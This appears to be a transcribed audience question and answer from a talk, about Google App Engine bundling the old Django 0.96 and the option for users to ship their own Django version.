Is there any communication with them? Get them to know that? Okay, so the question was, Google App Engine is using a very old version of Django, which is 0.96. Is there any communication with them to try and fix that? There has been a bit. With the App Engine, you can thankfully, these days you get your own version of Django in there by zipping it up and fixing it in.
Some people have tried to poke through them. They haven't done very much. App Engine doesn't seem to be, it seems to be sort of a bit of a, they've only started doing new features again. So I'm not sure the state of that is, but I think they've just left it in there because, just because. I mean, these days, I think they recommend do your own Django, so.
Thank you very much.